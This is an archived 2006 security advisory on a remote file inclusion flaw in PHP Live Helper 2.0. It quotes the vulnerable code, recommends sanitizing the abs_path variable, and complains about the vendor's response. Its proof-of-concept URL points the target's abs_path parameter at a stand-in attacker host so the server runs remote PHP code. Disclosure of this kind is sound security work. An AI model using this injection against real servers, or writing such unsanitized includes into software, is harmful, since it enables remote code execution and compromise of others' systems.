Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: b06-4048.htm

PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion



PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion
PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion



____________________   ___ ___ ________=0D
\_   _____/\_   ___ \ /   |   \\_____  \=0D
 |    __)_ /    \  \//    ~    \/   |   \=0D
 |        \\     \___\    Y    /    |    \=0D
/_______  / \______  /\___|_  /\_______  /=0D
        \/         \/       \/         \/                              .OR.ID=0D
ECHO_ADV_42$2006=0D
=0D
---------------------------------------------------------------------------------------------------=0D
[ECHO_ADV_42$2006] PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion=0D
---------------------------------------------------------------------------------------------------=0D
=0D
Author		: Ahmad Maulana a.k.a Matdhule=0D
Date Found	: July, 02nd 2006=0D
Location	: Indonesia, Jakarta=0D
web		: http://advisories.echo.or.id/adv/adv42-matdhule-2006.txt=0D 
Critical Lvl	: Highly critical=0D
Impact		: System access=0D
Where		: From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
PHP Live Helper=0D
=0D
Application	: PHP Live Helper=0D
version		: Latest version [2.0]=0D
URL		: http://www.turnkeywebtools.com/phplivehelper=0D 
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~~~=0D
=0D
-----------------------global.php----------------------=0D
....=0D
http://www.turnkeywebtools.com/phplivehelper/=0D 
  =0D
  Copyright (c) 2001-2006 Turnkey Web Tools, Inc.=0D
*/=0D
=0D
define('PLH_SESSION_START', '1');=0D
=0D
////////////////////////////=0D
// Load Class & Secure Files=0D
////////////////////////////=0D
=0D
require_once $abs_path."/libsecure.php";=0D
include_once $abs_path."/include/class.browser.php";=0D
...=0D
----------------------------------------------------------=0D
=0D
Input passed to the "abs_path" parameter in global.php is not=0D
properly verified before being used. This can be exploited to execute=0D
arbitrary PHP code by including files from local or external=0D
resources.=0D
=0D
Proof Of Concept:=0D
~~~~~~~~~~~~~~~~~=0D
=0D
http://target.com/[phplivehelper_path]/global.php?abs_path=http://attacker.com/inject.txt?=0D 
=0D
Solution:=0D
~~~~~~~~~=0D
- Sanitize variable $abs_path on global.php.=0D
=0D
Notification:=0D
~~~~~~~~~~~~=0D
=0D
I've been contacting the web/software administrator to tell about this hole in his system, but instead of giving  a nice =0D
=0D
response, he replied so rudely and arrogantly. I recommend not to use this product for your own sake.=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~=0D
~ solpot a.k.a chris, J4mbi  H4ck3r thx for the hacking lesson  :) =0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous=0D
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama=0D
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com=0D 
~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net=0D 
------------------------------------------------------------------------=0D
---=0D
Contact:=0D
~~~~~~=0D
 =0D
     matdhule[at]gmail[dot]com=0D
     =0D
-------------------------------- [ EOF ]----------------------------------=0D
 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH